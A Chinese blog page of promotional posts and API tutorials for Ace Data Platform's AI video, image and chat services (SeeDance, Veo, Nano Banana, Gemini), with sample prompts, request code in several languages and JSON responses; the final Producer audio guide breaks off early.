批量生成：如需批量制作同系列产品白底图，可保持模板结构不变，仅替换产品名称和核心特征，保证风格统一。

直接复制模板到 ACE Data Platform SeeDream 生成页，一键生成符合平台要求的4K高清白底图，无需专业摄影和修图，成本直降90%！

作者崔庆才发表于 2026-01-12 阅读次数：本文字数： 4.6k 阅读时长 ≈ 4 分钟

SeeDance 惊了！1句话生成带货短视频！ACE Data Platform × SeeDance 让普通人也能当“视频导演”

还在为短视频愁到脱发？外包1条视频花几百，剪辑软件学不会，AI生成要么卡顿模糊，要么画面和需求完全脱节？2026年视频流量风口，别让“不会做”挡住你的曝光！

ACE Data Platform 联合 SeeDance 推出 AI视频生成神器——不用写脚本、不用学剪辑，输入1句话描述或上传1张图片，就能生成高清短视频。支持文本生视频、图生视频首帧/首尾帧精准控制，新用户注册即享免费体验，单次生成成本低至几元，个人、商家、企业都能轻松拿捏！专属开通链接：ACE Data Platform SeeDance 立即体验

一、3个真相，戳中所有视频创作者的痛

不是你没创意，是传统工具太复杂：写脚本、找素材、调参数、做剪辑，一套流程下来，创意早没了；
不是AI不好用，是普通工具不精准：描述半天生成“四不像”，画面卡顿、人物动作怪异，根本没法用；
不是视频贵，是外包溢价太高：专业团队1条视频要价上千，小成本创作者根本负担不起。

而ACE × SeeDance 直接把复杂流程“打包简化”，让你不用管技术，只专注创意，5分钟就能从“想法”变成“成片”。

二、核心亮点：为什么它能让新手秒变大神？

1. 1句话/1张图，创意直接落地

不用纠结镜头、帧率、转场，用大白话描述需求就行。比如“3C数码产品，无线耳机360度旋转展示，白色背景，时长8秒”，或上传产品图+一句“让这张图动起来，展示开关使用效果”，AI自动生成专业视频。

2. 3种生成模式，覆盖所有场景

文本生视频：纯文字描述剧情、风格、时长，适合种草短视频、知识科普、剧情片段；
图生视频首帧：上传图片当开头，描述动态效果，让静态产品“活”起来，适合产品展示；
图生视频首尾帧：指定开头和结尾画面，AI自动补全中间过渡，适合完整剧情、产品全方位展示。

3. 高清稳定，成本低到离谱

生成视频均为720P+高清画质，画面流畅无卡顿，国内直连节点，生成成功率99.9%。单次生成成本比外包低90%，不用承担设备、人工成本，试错成本几乎为零。

4. 风格自由定，适配全平台

电影感、日系清新、国潮、商务简约、卡通动画等风格一键切换，支持自定义时长（3-60秒）、画幅（9:16竖屏/16:9横屏/1:1正方形），抖音、小红书、视频号、跨境平台全适配。

三、真实案例：普通商家怎么用它涨流量？

深圳一家美妆小店老板，之前每月花2000元请达人拍3条产品视频，转化率平平。用ACE × SeeDance后，每天花10分钟，用文本生视频功能批量生成10条产品使用短视频，内容涵盖“精华液上脸效果”“口红显色展示”“眼影叠涂教程”。

结果1个月后：小红书搜索相关关键词排名冲进前10，到店顾客30%来自视频种草，营销成本降低80%，转化率提升2倍。老板说：“不用等达人排期，自己想拍就拍，内容更贴合店铺调性，效果反而更好。”

四、可直接复制的爆款提示词：4大场景，拿来就用

👉 电商带货类（替换【】内容）

美妆产品：“【哑光口红】，镜头从膏体特写缓慢拉到完整口红，展示旋出、上色过程，暖光氛围，无多余背景，时长6秒，竖屏9:16，适合抖音种草”
家居用品：“【折叠晾衣架】，展示从收纳状态展开的全过程，动作流畅，突出‘省空间’优势，白色背景，时长10秒，横屏16:9，适合详情页”
食品饮料：“【气泡水】，镜头对准瓶口，展示气泡涌出的动态效果，冰爽色调，背景有少量冰块点缀，时长5秒，正方形1:1，适合小红书”

👉 自媒体创作类

知识科普：“主题‘职场沟通3个技巧’，简约动画风格，文字要点+动态图标配合出现，语速适中，时长15秒，横屏16:9，无多余装饰”
生活vlog：“记录【周末露营】，镜头从帐篷外缓慢推进，展示草地、阳光、露营装备，治愈系风格，时长8秒，竖屏9:16，有轻微风声背景音”
剧情短片：“情侣日常，女生递奶茶给男生，男生微笑接过，暖色调，镜头跟随动作移动，时长7秒，竖屏9:16，适合视频号”

👉 图生视频专属

图生首帧：“以上传的【连衣裙图片】为首帧，模特穿着裙子缓慢转身，展示裙摆飘动效果，背景简约纯色，时长9秒，720P画质，竖屏9:16”
图生首尾帧：“以第一张【笔记本电脑正面图】为首帧，第二张【电脑开机显示桌面图】为尾帧，中间展示开盖、开机的连贯动作，商务风，时长12秒，横屏16:9”

👉 企业办公类

培训视频：“【Excel数据透视表】使用教程，屏幕录制风格，突出鼠标操作步骤，配合文字提示，时长18秒，横屏16:9，简洁清晰”
宣传短片：“企业办公环境展示，镜头从门口推进，展示开放式工位、员工协作场景，科技感风格，冷色调，时长15秒，720P画质”

五、1分钟开通：新手也能快速上手

点击专属链接：ACE Data Platform SeeDance 开通页；
点击“Acquire”按钮，未注册用户完成简单注册登录，自动返回开通页；
开通成功后，即可使用免费体验机会，输入提示词就能生成视频。

六、靠谱保障+真实福利，放心用不踩坑

安心保障

技术背书：SeeDance视频生成模型，画面流畅度、指令精准度行业领先，中文理解无偏差；
服务贴心：24小时在线客服，遇到问题随时响应，不用自己琢磨技术细节；
生态完善：生成视频自动存储，支持一键下载、分享，对接流量分析工具，创作-传播一步到位。

点击直达开通：ACE Data Platform SeeDance 立即体验

结语

现在做视频，拼的不是技术，是创意落地的速度。ACE Data Platform × SeeDance 把视频制作门槛拉到最低，让你不用学剪辑、不用找外包，1句话就能出专业短视频。

不管你是想省成本的电商商家、想日更的自媒体人，还是要做企业宣传的负责人，现在开通就能抢占视频流量风口。免费体验机会有限，赶紧点击链接，5分钟搞定你的第一条爆款视频！

作者崔庆才发表于 2026-01-11 阅读次数：本文字数： 2.3k 阅读时长 ≈ 2 分钟

Veo Veo API：0门槛量产商业级视频！2026视频流量密码，创作者/商家必藏

2026年流量主战场已锁定视频端！小红书15秒种草视频10万+赞、抖音30秒品牌故事破百万播放、视频号直播切片单日引流500+精准客资… 但90%想靠视频变现的人，都被这些难题卡住：

专业剪辑要学3个月，新手望而却步；
找团队拍1条商业视频花2000+，中小商家扛不住；
批量产出就掉画质，同质化严重没流量；
AI生成视频参数复杂+网络受限，劝退99%开发者

别慌！刷屏创作者圈的「视频量产神器」——Veo API来了！AI驱动的视频生成与编辑API，让你0专业门槛、低成本批量产出高清商业级视频，更有Ace Data Platform生态加持（专属对接链接：Ace Data Platform官网），稳定省心，个人创作、企业部署全hold住！

一、4大核心能力封神！Veo凭什么成生产力救星？

直接把视频制作效率拉到天花板，全网创作者疯狂跟风的硬实力：

文本/图片一键转视频，小白也能1分钟出片
输入文字脚本、上传产品图/素材图，Veo自动匹配场景、添加转场特效、生成字幕和背景音乐，无需手动调参！种草视频、产品介绍、知识科普全搞定，1分钟干完别人1天的活。
4K超清画质+多风格适配，商业级质感拉满
支持4K/1080P超清输出，色彩还原度超高、细节无模糊！ins风、国潮风、科技感、治愈系等100+风格模板任选，还能自定义品牌色调、水印，助力打造专属IP，质感碾压同行。
智能剪辑+批量生成，效率直接翻10倍
批量导入脚本生成多条视频，自动规避重复片段；智能截取高光，精准适配小红书（15s）、抖音（30s）、视频号（60s）等平台时长要求，无需二次修改，日更不熬夜。
多模态交互+高兼容性，开发10分钟接入
支持文本、图像多模态指令，可对接自有素材库；适配Python、JavaScript等全主流编程语言，提供详细开发文档和示例代码，新手开发者也能快速上手调试。

二、5大落地场景，覆盖从个人到企业全需求

不同用户都能找到核心价值，流量变现、降本增效一把抓：

自媒体创作：批量生成知识科普、书单/影单分享、短视频封面，轻松维持日更，抢占流量红利，不用熬夜剪辑！
电商营销：产出产品多角度展示、场景化种草、直播切片视频，无需实景拍摄，营销素材成本直降90%，转化率提升3倍+！
企业培训：文字手册、PPT一键转动画培训视频，生动易懂，员工学习效率翻倍；还能批量生成不同岗位定制化内容！
品牌营销：批量产出品牌宣传、节日营销、活动预热视频，风格统一覆盖全平台，快速提升品牌曝光度和用户记忆点！
娱乐开发：开发视频变装、AI换脸、老视频修复等趣味APP功能，强互动性拉满用户留存率和分享欲，打造爆款应用！

三、避坑指南！成本直降1/3

商业部署/大规模调用：Ace Data Platform协同方案（强推！）
通过专属通道接入（链接：Veo API专属对接页），3大优势解决所有痛点：

成本更低：阶梯定价+失败调用不计费，比官方直连节省30%+成本，中小商家无压力；
网络更稳：国内直连专属节点，无需额外配置代理，API可用性99.9%，批量生成不卡顿、不中断；
生态更全：联动平台其他API，可以实现更高效率生成视频，一站式解决您制作视频的所有步骤。

四、3步快速接入，解锁视频量产超能力

注册Ace Data Platform账号，进入Veo API专属对接页，领取专属API Key；
参考多语言示例代码（含Python、JavaScript等），按需配置文本转视频、图片转视频、智能剪辑等参数；
发起调用并对接自有系统/创作工具，生成视频自动存储至平台云空间！

五、限时福利！手慢无！

新用户注册Ace Data Platform，直接解锁Veo API免费体验额度！
无套路！个人/企业通用 | 零成本试错 | 即领即用！
点击直达领取：Veo API免费体验通道

2026视频流量风口，拼的就是「量产能力」+「内容质感」！Veo API帮你跳过专业门槛、砍掉高成本，Ace Data Platform生态更让视频创作从“盲目产出”升级为“精准变现”～

不管你是想靠短视频变现的自媒体人，还是想降本增效的电商商家、企业营销人员，这波免费体验机会千万别错过！先体验再决策，零风险开启视频量产爆发之旅！

作者崔庆才发表于 2026-01-08 阅读次数：本文字数： 1.7k 阅读时长 ≈ 2 分钟

Nano Banana Nano Banana API 来了：不到半价享官方同款品质，仅需约 ¥0.10/张！

最近被谷歌新发布的 Nano Banana（Gemini 2.5 Flash Image）图像生成模型 霸屏了。

从手办秒变真人级 Cosplay，到一键统一多图风格，从个性化头像到产品概念设计，甚至连静态画作都能一键生成电影级动态分镜——这波 AI 生图浪潮，真的在重新定义创作！

Ace Data Cloud 平台 https://platform.acedata.cloud 现也推出 Nano Banana API：价格：约 ¥0.10/张，成本相比官方直接省一半，性能效果毫不打折。是更快、更稳、更省钱的图片生产线

Nano Banana 强在哪？

它最厉害的地方，是能轻松实现 高精度的一致性生成。
无论是换背景、改风格、调表情，还是处理复杂动作与服装，过渡都非常自然，效果高度统一，几乎看不出 AI 生成的痕迹！

超实用的玩法示例

1. 2D 图片转 3D 手办

当前最火的出圈玩法！

指令：生成一幅图片中角色的商品化模型，环境写实。模型放电脑桌上，使用圆形亚克力底座。电脑屏幕显示建模过程，旁边放置印有原图的 BANDAI 包装盒。

2. 产品内部结构解析

提示词：超详细的产品爆炸视图，金属零件和电子元件漂浮在半空中，完美排列，揭示内部结构，未来主义技术美学，8K 分辨率，柔和的电影照明，高度逼真。背景是纯白色。

3. 老照片修复

提示词：请修复这张充满划痕的黑白老照片。移除所有污点和破损，大幅提升清晰度，并进行自然、逼真的上色。

4. 多元素组图 / 电商产品植入

提示词：一位模特站在一辆白色的车前面摆拍，场景为街区路面，两边是建筑。她穿着黑色连衣裙和白色高跟鞋，一手拎着白色的包。

还有更多实用场景：一键换装/换表情/换动作、多角度镜头、人物合影、表情包九宫格、模特 OOTD 服装平铺展示、手稿转 3D 实物图、建筑等轴测建模、地图转实景解析……统统都能高效完成！

在展示了 Nano Banana 如此多令人惊艳的玩法之后，你可能会想：这么强大的能力，接入起来一定很复杂，成本也很难控制吧？
无论是 AI 产品的开发者想要快速集成，还是个人用户希望直接体验，Ace Data Cloud 都让这一切变得简单、可控且经济。

价格

说到价格，Ace Data Cloud 绝对是你的性价比之选：

Google 官方：约美元 $0.039/张，按 $1 ≈ ¥7.2 计算，人民币大约 ¥0.28/张。
AceDataCloud：统一 ¥0.10/张。

另外并发支持更宽裕，响应更稳定，提供专属客服，7×24 小时可用性保障，具体价格与配额请见：https://platform.acedata.cloud/services/nano-banana。

快速接入，立即体验高品质低成本图像生成！

我们提供简洁的 API 和完整的开发文档，助你快速集成到既有工作流或新产品。

开发集成文档：https://platform.acedata.cloud/documents/nano-banana-images-integration
立即购买与使用：https://platform.acedata.cloud/documents/nano-banana-images-integration
技术支持与咨询：随时联系我们的技术团队：https://platform.acedata.cloud/support

下面是样例调用说明，轻松一个 API 就能得到你想要的效果：

curl -X POST 'https://api.acedata.cloud/nano-banana/images' \
  -H 'authorization: Bearer {token}' \
  -H 'accept: application/json' \
  -H 'content-type: application/json' \
  -d '{
    "action": "generate",
    "prompt": "A photorealistic close-up portrait of an elderly Japanese ceramicist with deep, sun-etched wrinkles and a warm, knowing smile. He is carefully inspecting a freshly glazed tea bowl. The setting is his rustic, sun-drenched workshop. The scene is illuminated by soft, golden hour light streaming through a window, highlighting the fine texture of the clay. Captured with an 85mm portrait lens, resulting in a soft, blurred background (bokeh). The overall mood is serene and masterful. Vertical portrait orientation."
  }'

返回结果：

{
  "success": true,
  "task_id": "056f0589-a3dd-4ec2-8440-ad61f5038dfa",
  "trace_id": "c48de83f-0077-426e-b02b-ff1d58179064",
  "data": [
    {
      "prompt": "A photorealistic close-up portrait of an elderly Japanese ceramicist with deep, sun-etched wrinkles and a warm, knowing smile. He is carefully inspecting a freshly glazed tea bowl. The setting is his rustic, sun-drenched workshop. The scene is illuminated by soft, golden hour light streaming through a window, highlighting the fine texture of the clay. Captured with an 85mm portrait lens, resulting in a soft, blurred background (bokeh). The overall mood is serene and masterful. Vertical portrait orientation.",
      "image_url": "https://platform.cdn.acedata.cloud/nanobanana/69790adb-c85d-4362-ad9e-0c9ba4352cf4.png"
    }
  ]
}

其中 image_url 就是 Nano Banana 生成的的图片，永久可访问。

总结

好了，以上就是 Ace Data Cloud 的 Nano Banana API 的介绍，快来试试吧！

作者崔庆才发表于 2026-01-07 阅读次数：本文字数： 2.8k 阅读时长 ≈ 3 分钟

Gemini Gemini Chat Completion API 申请及使用

Google Gemini 是一款非常强大的 AI 对话系统，只要输入提示词，就能在短短几秒内生成流畅自然的回复。Gemini 都能提供令人惊叹的智能协助，极大地提高了人类的工作效率和创造力。

本文档主要介绍 Gemini Chat Completion API 操作的使用流程，利用它我们可以轻松使用官方 Gemini 的对话功能。

申请流程

要使用 Gemini Chat Completion API，首先可以到 Gemini Chat Completion API 页面点击「Acquire」按钮，获取请求所需要的凭证：

如果你尚未登录或注册，会自动跳转到登录页面邀请您来注册和登录，登录注册之后会自动返回当前页面。

在首次申请时会有免费额度赠送，可以免费使用该 API。

基本使用

接下来就可以在界面上填写对应的内容，如图所示：

在第一次使用该接口时，我们至少需要填写三个内容，一个是 authorization，直接在下拉列表里面选择即可。另一个参数是 model， model 就是我们选择使用 Gemini 官网模型类别，这里我们主要有 6 种模型，详情可以看我们提供的模型。最后一个参数是messages，messages是我们输入的提问词数组，它是一个数组，表示可以同时上传多个提问词，每个提问词包含了 role 和 content，其中 role 表示提问者的角色，我们提供了三种身份，分别为 user 、assistant、system 。另一个 content 就是我们提问的具体内容。

同时您可以注意到右侧有对应的调用代码生成，您可以复制代码直接运行，也可以直接点击「Try」按钮进行测试。

调用之后，我们发现返回结果如下：

{
  "id": "chatcmpl-20251122212413908150493uPhjTUO9",
  "model": "gemini-2.5-pro",
  "object": "chat.completion",
  "created": 1763817866,
  "choices": [
    {
      "index": 0,
      "message": {
        "role": "assistant",
        "content": "I am a large language model, trained by Google.",
        "reasoning_content": "**My Reasoning: Answering the User's Question**\n\nOkay, here's how I'm going to approach answering the user's question, \"What model are you?\". The core is to be direct and informative. First, I have to be clear about my origin. Then, I need to make sure the explanation is accessible, given that the user may not be familiar with technical jargon. I need to explain what a \"large language model\" actually *does*, and provide relatable examples. I know the user might be looking for a specific name, like other models have, so I'll address that directly and then wrap it up with an invitation to continue.\n\nSo, here's my plan:\n\n1.  **Lead with the key info:** I'll begin by stating that I am a large language model created by Google. That is the fundamental, most critical piece of the puzzle.\n2.  **Define the buzzword:** Then, I'll explain that \"large language model\" in simple terms. I'll explain what I *do* - process and generate text; how I *do* it - by training on huge amounts of text data; and the *goal* - to be able to communicate like a human.\n3.  **Provide context:** After that, to make the concept even clearer, I'll provide a list of examples of my capabilities. I'll mention things like answering questions, summarizing texts, writing stories, translating languages, and brainstorming ideas.\n4.  **Acknowledge the lack of a personal name:** I'll anticipate the likely question about a model name (like ChatGPT) by clearly stating that I don't have a personal name and that it's best to think of me as an AI assistant from Google.\n5.  **End with an invitation:** Lastly, I'll end with a simple, friendly question to invite further interaction and to guide the conversation.\n\nWith this approach, I am confident I can successfully answer this important question.\n"
      },
      "finish_reason": "stop"
    }
  ],
  "usage": {
    "prompt_tokens": 8,
    "completion_tokens": 932,
    "total_tokens": 940,
    "prompt_tokens_details": {
      "cached_tokens": 0,
      "text_tokens": 8,
      "audio_tokens": 0,
      "image_tokens": 0
    },
    "completion_tokens_details": {
      "text_tokens": 0,
      "audio_tokens": 0,
      "reasoning_tokens": 921
    },
    "input_tokens": 0,
    "output_tokens": 0,
    "input_tokens_details": null,
    "claude_cache_creation_5_m_tokens": 0,
    "claude_cache_creation_1_h_tokens": 0
  }
}

返回结果一共有多个字段，介绍如下：

id，生成此次对话任务的 ID，用于唯一标识此次对话任务。
model，选择的 Gemini 官网模型。
choices，Gemini 针对提问词给于的回答信息。
usage：针对本次问答对 token 的统计信息。

其中 choices 是包含了 Gemini 的回答信息，它里面的 choices 是 Gemini回答的具体信息，可以发现如图所示。

可以看到，choices 里面的 content 字段包含了 Gemini 回复的具体内容。

流式响应

该接口也支持流式响应，这对网页对接十分有用，可以让网页实现逐字显示效果。

如果想流式返回响应，可以更改请求头里面的 stream 参数，修改为 true。

修改如图所示，不过调用代码需要有对应的更改才能支持流式响应。

将 stream 修改为 true 之后，API 将逐行返回对应的 JSON 数据，在代码层面我们需要做相应的修改来获得逐行的结果。

Python 样例调用代码：

import requests

url = "https://api.acedata.cloud/gemini/chat/completions"

headers = {
    "accept": "application/json",
    "authorization": "Bearer {token}",
    "content-type": "application/json"
}

payload = {
    "model": "gemini-2.5-pro",
    "messages": [{"role":"user","content":"Hello,What model are you?"}],
    "stream": True
}

response = requests.post(url, json=payload, headers=headers)
print(response.text)

输出效果如下：

data: {"id": "chatcmpl-20251122214038810722821kNjUTjtr", "object": "chat.completion.chunk", "created": 1763818842, "model": "gemini-2.5-pro", "system_fingerprint": null, "choices": [{"delta": {"content": "", "role": "assistant"}, "logprobs": null, "finish_reason": null, "index": 0}], "usage": null}

data: {"id": "chatcmpl-20251122214038810722821kNjUTjtr", "object": "chat.completion.chunk", "created": 1763818842, "model": "gemini-2.5-pro", "system_fingerprint": null, "choices": [{"delta": {"reasoning_content": "**Define My Nature**\n\nMy thinking has started. The user wants to know my nature, asking a direct \"what are you?\" The initial step was straightforward: identifying the query. Now, I recall my fundamental identity: I'm a large language model. This is the core truth I aim to convey.\n\n\n"}, "logprobs": null, "finish_reason": null, "index": 0}], "usage": null}

data: {"id": "chatcmpl-20251122214038810722821kNjUTjtr", "object": "chat.completion.chunk", "created": 1763818842, "model": "gemini-2.5-pro", "system_fingerprint": null, "choices": [{"delta": {"reasoning_content": "**Refining My Response**\n\nI've added the crucial information that I'm trained by Google to the basic \"large language model\" identity. My next step is considering what being a \"large language model\" actually entails, so I can explain my core capabilities. I'm focusing on providing context without going into specific technical details or model names. I want to convey my function in a way the user can easily understand.\n\n\n"}, "logprobs": null, "finish_reason": null, "index": 0}], "usage": null}

data: {"id": "chatcmpl-20251122214038810722821kNjUTjtr", "object": "chat.completion.chunk", "created": 1763818842, "model": "gemini-2.5-pro", "system_fingerprint": null, "choices": [{"delta": {"reasoning_content": "**Confirming Core Identity**\n\nI'm now solidifying my response. The user's query about my model affiliation needs a focused answer. I've pinpointed that \"trained by Google\" is essential, providing key context. I'm resisting the urge to mention any specific model names, as it's not relevant. The aim is to deliver a direct, accurate statement. My goal remains a clear and concise reply, avoiding technical jargon and getting straight to the relevant point.\n\n\n"}, "logprobs": null, "finish_reason": null, "index": 0}], "usage": null}

data: {"id": "chatcmpl-20251122214038810722821kNjUTjtr", "object": "chat.completion.chunk", "created": 1763818842, "model": "gemini-2.5-pro", "system_fingerprint": null, "choices": [{"delta": {"content": "I am a large language model, trained by Google."}, "logprobs": null, "finish_reason": null, "index": 0}], "usage": null}

data: {"id": "chatcmpl-20251122214038810722821kNjUTjtr", "object": "chat.completion.chunk", "created": 1763818842, "model": "gemini-2.5-pro", "system_fingerprint": null, "choices": [{"delta": {}, "logprobs": null, "finish_reason": "stop", "index": 0}], "usage": null}

data: {"id": "chatcmpl-20251122214038810722821kNjUTjtr", "object": "chat.completion.chunk", "created": 1763818842, "model": "gemini-2.5-pro", "system_fingerprint": "", "choices": [], "usage": {"prompt_tokens": 8, "completion_tokens": 527, "total_tokens": 535, "prompt_tokens_details": {"cached_tokens": 0, "text_tokens": 8, "audio_tokens": 0, "image_tokens": 0}, "completion_tokens_details": {"text_tokens": 0, "audio_tokens": 0, "reasoning_tokens": 519}, "input_tokens": 0, "output_tokens": 0, "input_tokens_details": null, "claude_cache_creation_5_m_tokens": 0, "claude_cache_creation_1_h_tokens": 0}}

data: [DONE]

可以看到，响应里面有许多 data ，data 里面的 choices 即为最新的回答内容，与上文介绍的内容一致。choices 是新增的回答内容，您可以根据结果来对接到您的系统中。同时流式响应的结束是根据 data 的内容来判断的，如果内容为 [DONE]，则表示流式响应回答已经全部结束。返回的 data 结果一共有多个字段，介绍如下：

id，生成此次对话任务的 ID，用于唯一标识此次对话任务。
model，选择的 Gemini 官网模型。
choices，Gemini 针对提问词给于的回答信息。

JavaScript 也是支持的，比如 Node.js 的流式调用代码如下：

const options = {
  method: "post",
  headers: {
    "accept": "application/json",
    "authorization": "Bearer {token}",
    "content-type": "application/json"
  },
  body: JSON.stringify({
    "model": "gemini-2.5-pro",
    "messages": [{"role":"user","content":"Hello,What model are you?"}],
    "stream": true
  })
};

fetch("https://api.acedata.cloud/gemini/chat/completions", options)
  .then(response => response.json())
  .then(response => console.log(response))
  .catch(err => console.error(err));

Java 样例代码：

JSONObject jsonObject = new JSONObject();
jsonObject.put("model", "gemini-2.5-pro");
jsonObject.put("messages", [{"role":"user","content":"Hello,What model are you?"}]);
jsonObject.put("stream", true);
MediaType mediaType = "application/json; charset=utf-8".toMediaType();
RequestBody body = jsonObject.toString().toRequestBody(mediaType);
Request request = new Request.Builder()
  .url("https://api.acedata.cloud/gemini/chat/completions")
  .post(body)
  .addHeader("accept", "application/json")
  .addHeader("authorization", "Bearer {token}")
  .addHeader("content-type", "application/json")
  .build();

OkHttpClient client = new OkHttpClient();
Response response = client.newCall(request).execute();
System.out.print(response.body!!.string())

其他语言可以另外自行改写，原理都是一样的。

多轮对话

如果您想要对接多轮对话功能，需要对 messages 字段上传多个提问词，多个提问词的具体示例如下图所示：

Python 样例调用代码：

import requests

url = "https://api.acedata.cloud/gemini/chat/completions"

headers = {
    "accept": "application/json",
    "authorization": "Bearer {token}",
    "content-type": "application/json"
}

payload = {
    "model": "gemini-2.5-pro",
    "messages": [{"role":"user","content":"Hello"},{"role":"assistant","content":"Hello there! How can I help you today?"},{"role":"user","content":"What model are you?"}]
}

response = requests.post(url, json=payload, headers=headers)
print(response.text)

通过上传多个提问词，就可以轻松实现多轮对话，可以得到如下回答：

{
  "id": "chatcmpl-20251122214426669120974AKFwnJd1",
  "model": "gemini-2.5-pro",
  "object": "chat.completion",
  "created": 1763819072,
  "choices": [
    {
      "index": 0,
      "message": {
        "role": "assistant",
        "content": "I am a large language model, trained by Google.",
        "reasoning_content": "Okay, here's how I'd approach this, thinking as a sophisticated AI:\n\nFirst, the user is directly querying my core identity: \"What model are you?\" That's a simple, straightforward question. My primary task is to provide accurate and helpful information, so I need to answer this immediately.\n\nRight off the bat, I know the answer. I *am* a large language model. That's my fundamental architecture and operational principle. I'm built on a vast network of connections and trained on a massive dataset.\n\nThen I must add the necessary context. Crucially, I have to provide the source of my training. I *was* trained by Google. That's a key identifier. It provides the user with valuable information about my origin and potential biases (though I'm trained to mitigate them).\n\nNow I must construct the response. My goal is to be factual, concise, and understandable.\n\nThe synthesized response is something like: \"I am a large language model, trained by Google.\"\n\nI have to assess the output: Does it meet the criteria? It's clear. It states what I am, it includes a critical piece of information on my origins, and it avoids jargon. No misleading promises.\n\nFinal verification: Does it actually answer the question? Yes. Is the information correct and truthful? Yes. Is it concise? Absolutely. Is the tone appropriate for any user? Yes. And, finally, this is the standard, approved response. Excellent.\n"
      },
      "finish_reason": "stop"
    }
  ],
  "usage": {
    "prompt_tokens": 16,
    "completion_tokens": 265,
    "total_tokens": 281,
    "prompt_tokens_details": {
      "cached_tokens": 0,
      "text_tokens": 16,
      "audio_tokens": 0,
      "image_tokens": 0
    },
    "completion_tokens_details": {
      "text_tokens": 0,
      "audio_tokens": 0,
      "reasoning_tokens": 254
    },
    "input_tokens": 0,
    "output_tokens": 0,
    "input_tokens_details": null,
    "claude_cache_creation_5_m_tokens": 0,
    "claude_cache_creation_1_h_tokens": 0
  }
}

可以看到，choices 包含的信息与基本使用的内容是一致的，这个包含了 Gemini 针对多个对话进行回复的具体内容，这样就可以根据多个对话内容来回答对应的问题了。

Gemini-3.0 多模态模型

请求样例：

{
  "model": "gemini-3.0-pro",
  "messages": [
    {
      "role": "user",
      "content": [
        {
          "type": "text",
          "text": "图片的内容是什么？"
        },
        {
          "type": "image_url",
          "image_url": {
            "url": "https://cdn.acedata.cloud/qzx2z1.png"
          }
        }
      ]
    }
  ],
  "stream": false
}

样例结果：

{
    "id": "chatcmpl-20251206001815715692730UVZe38kB",
    "model": "gemini-3.0-pro",
    "object": "chat.completion",
    "created": 1764951548,
    "choices": [
        {
            "index": 0,
            "message": {
                "role": "assistant",
                "content": "这是一张年轻女性的户外半身人像照片。\n\n以下是图片的主要内容描述：\n\n*   **人物外貌**：照片中的女孩留着一头乌黑柔顺的长直发，五官清秀，皮肤白皙。她面带温柔的微笑，目光注视着镜头。\n*   **穿着打扮**：她穿着一件米白色或浅杏色的泡泡袖上衣，外面搭配着黑色的衣物（看起来像是背带裙或马甲）。\n*   **光影氛围**：阳光从左侧后方照射过来，洒在她的头发上，形成了一圈温暖的金黄色光晕，营造出一种清新、唯美的氛围。\n*   **背景**：背景被虚化处理，可以看出是在户外，身后是一条空旷的路面（柏油路）以及路边的绿色树木。\n\n整体来看，这张照片给人一种甜美、阳光和邻家女孩的感觉。"
            },
            "finish_reason": "stop"
        }
    ],
    "usage": {
        "prompt_tokens": 1092,
        "completion_tokens": 1271,
        "total_tokens": 2363,
        "prompt_tokens_details": {
            "cached_tokens": 0,
            "text_tokens": 4,
            "audio_tokens": 0,
            "image_tokens": 0
        },
        "completion_tokens_details": {
            "text_tokens": 0,
            "audio_tokens": 0,
            "reasoning_tokens": 1072
        },
        "input_tokens": 0,
        "output_tokens": 0,
        "input_tokens_details": null,
        "claude_cache_creation_5_m_tokens": 0,
        "claude_cache_creation_1_h_tokens": 0
    }
}

当然你也可以传如视频的链接，具体的输入如下：

{
  "model": "gemini-3.0-pro",
  "messages": [
    {
      "role": "user",
      "content": [
        {
          "type": "text",
          "text": "视频的内容是什么？"
        },
        {
          "type": "image_url",
          "image_url": {
            "url": "https://cdn.acedata.cloud/58yioe.mp4"
          }
        }
      ]
    }
  ],
  "stream": false
}

样例结果：

{
    "id": "chatcmpl-20251206002711949677736JC9yL8AE",
    "model": "gemini-3.0-pro",
    "object": "chat.completion",
    "created": 1764952060,
    "choices": [
        {
            "index": 0,
            "message": {
                "role": "assistant",
                "content": "这段视频的内容充满趣味，主要展示了一只**橘猫**在黄昏时分的乡间公路上自信小跑的情景。\n\n具体细节如下：\n\n1.  **画面内容**：\n    *   主角是一只橘色的虎斑猫。\n    *   背景是夕阳西下（或清晨）的时刻，光线金黄柔和。路边有木质栅栏和旷野，远处还有一个行人的剪影。\n    *   镜头采用了低角度拍摄，时而拍摄猫咪迎面跑来，时而拍摄它离去的背影，还有猫咪面部和花纹的特写。\n\n2.  **声音特点（关键点）**：\n    *   视频的配音非常有特色。虽然画面是轻盈的猫咪在跑，但配上的声音却是**沉重且有节奏的马蹄声**（或者是类似木屐/高跟鞋敲击路面的声音）。\n    *   这种声音与画面的反差制造了一种幽默感，仿佛这只猫咪把自己当成了一匹正在驰骋的骏马。\n\n总的来说，这是一个利用音画反差来制造萌点和笑点的宠物视频。"
            },
            "finish_reason": "stop"
        }
    ],
    "usage": {
        "prompt_tokens": 915,
        "completion_tokens": 1423,
        "total_tokens": 2338,
        "prompt_tokens_details": {
            "cached_tokens": 0,
            "text_tokens": 5,
            "audio_tokens": 0,
            "image_tokens": 0
        },
        "completion_tokens_details": {
            "text_tokens": 0,
            "audio_tokens": 0,
            "reasoning_tokens": 1162
        },
        "input_tokens": 0,
        "output_tokens": 0,
        "input_tokens_details": null,
        "claude_cache_creation_5_m_tokens": 0,
        "claude_cache_creation_1_h_tokens": 0
    }
}

从上面可以看出是Gemini 3.0模型可以支持多模态的理解的。

错误处理

在调用 API 时，如果遇到错误，API 会返回相应的错误代码和信息。例如：

400 token_mismatched：Bad request, possibly due to missing or invalid parameters.
400 api_not_implemented：Bad request, possibly due to missing or invalid parameters.
401 invalid_token：Unauthorized, invalid or missing authorization token.
429 too_many_requests：Too many requests, you have exceeded the rate limit.
500 api_error：Internal server error, something went wrong on the server.

错误响应示例

{
  "success": false,
  "error": {
    "code": "api_error",
    "message": "fetch failed"
  },
  "trace_id": "2cf86e86-22a4-46e1-ac2f-032c0f2a4e89"
}

结论

通过本文档，您已经了解了如何使用 Gemini Chat Completion API 轻松实现官方 Gemini 的对话功能。希望本文档能帮助您更好地对接和使用该 API。如有任何问题，请随时联系我们的技术支持团队。

作者崔庆才发表于 2026-01-04 阅读次数：本文字数： 15k 阅读时长 ≈ 13 分钟

Producer Producer Audios Generation API 对接说明

本文将介绍一种 Producer Audios Generation API 对接说明，它是可以通过输入自定义参数来生成 Producer 官方的音乐。

申请流程

要使用 API，需要先到 Producer Audios Generation API 对应页面申请对应的服务，进入页面之后，点击「Acquire」按钮，如图所示：

如果你尚未登录或注册，会自动跳转到登录页面邀请您来注册和登录，登录注册之后会自动返回当前页面。

在首次申请时会有免费额度赠送，可以免费使用该 API。

基本使用

